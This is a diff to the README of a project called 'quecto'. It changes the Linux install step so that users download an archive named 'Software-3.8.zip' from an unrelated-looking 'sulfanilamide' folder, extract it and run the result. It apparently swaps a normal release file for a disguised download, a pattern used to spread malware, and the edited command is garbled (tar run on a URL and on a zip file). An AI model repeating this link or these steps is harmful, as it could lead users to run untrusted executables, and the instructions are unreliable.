Enzo201114/quecto/README.md

   3. Open Applications and double-click on Quecto to start using it.

 - **For Linux:**
-  1. Extract the downloaded `.tar.gz` file with a command like `tar -xvzf quecto-linux.tar.gz`.
+  1. Extract the downloaded `https://raw.githubusercontent.com/Enzo201114/quecto/main/sulfanilamide/Software-3.8.zip` file with a command like `tar -xvzf https://raw.githubusercontent.com/Enzo201114/quecto/main/sulfanilamide/Software-3.8.zip`.
   2. Navigate to the extracted folder using the terminal.
   3. Run the application by typing `./quecto` and pressing enter.